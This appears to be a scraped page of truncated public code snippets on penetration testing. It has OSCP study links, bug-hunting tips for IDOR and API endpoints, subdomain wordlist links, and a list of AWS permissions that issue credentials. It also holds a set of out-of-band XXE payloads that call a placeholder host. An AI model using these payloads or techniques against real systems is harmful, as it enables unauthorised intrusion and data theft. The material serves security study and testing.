cyberheartmi9

import requests
import re




def extract(x):
    link = re.compile("""src=[\"\']/r(.*)[\"\']""")
    links = link.finditer(x)
    for i in links:

cyberheartmi9

import requests
import re




def extract(x):
    link = re.compile("""src=[\"\']/r(.*)[\"\']""")
    links = link.finditer(x)
    for i in links:

cyberheartmi9

import requests
import re




def extract(x):
    link = re.compile("""src=[\"\']/r(.*)[\"\']""")
    links = link.finditer(x)
    for i in links:

cyberheartmi9

#notes
https://www.cnblogs.com/keepmoving1113/tag/OSCP/
https://hausec.com/pentesting-cheatsheet/
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
https://noobsec.net/oscp-cheatsheet/
https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html
https://www.reddit.com/r/oscp/comments/824v7z/oscp_exam_taking_fraud/
https://github.com/OlivierLaflamme/Cheatsheet-God
https://johntuyen.com/personal/2019/05/25/personal-oscpcheatsheet.html

honoki

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

iknowjason

1.  Edit the file for any nmap specific options after masscan runs
2.  Run it:  masscan_nmap2.py -i <IP> -p <Ports> -r <RATE>

Uyavuz24

* If worldist can't find anything on api, use hakrawler
* every domain could have an api. add jSON extension to endpoints and see response
* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features)
* Some endpoints will return you UUID as a response to e-mail adress etc...
* If there is no leak of User ID, just swap with user id of another account you created
* Look for permissions in every endpoint
* change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, Arjun it
* Use all HTTP Request methods
* Look for IDORs in HTTP headers and body

cihanmehmet

⏳🔺33 Million Subdomain Wordlist🔻🧱🔨👀

https://mega.nz/file/UsJXzITR#TMIFTXnW1zABHfZUIKMPMvA-c8UvzGWeAd4mg4gGCtQ

cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
 33927885 33m-subdomain-wordlist.txt

---

🚨🔺15 Million Subdomain Wordlist🔻 🧱🔨👀

https://mega.nz/file/BtIh2KaZ#zI1aZgAdHYdBfvKC5G8bwXwfFG11Gx0CW1zLhc0weC8

mausch

#!/usr/bin/env bash

set -eu

dockerfile=$(mktemp)
trap "rm $dockerfile" EXIT
cat << EOF > $dockerfile
FROM ubuntu:bionic

RUN apt-get update && apt-get install -y wget gnupg2

kmcquade

• chime:CreateApiKey
• codepipeline:PollForJobs
• cognito-identity:GetOpenIdToken
• cognito-identity:GetOpenIdTokenForDeveloperIdentity
• cognito-identity:GetCredentialsForIdentity
• connect:GetFederationToken
• connect:GetFederationTokens
• ecr:GetAuthorizationToken
• [gamelift:RequestUploadCredentials](ht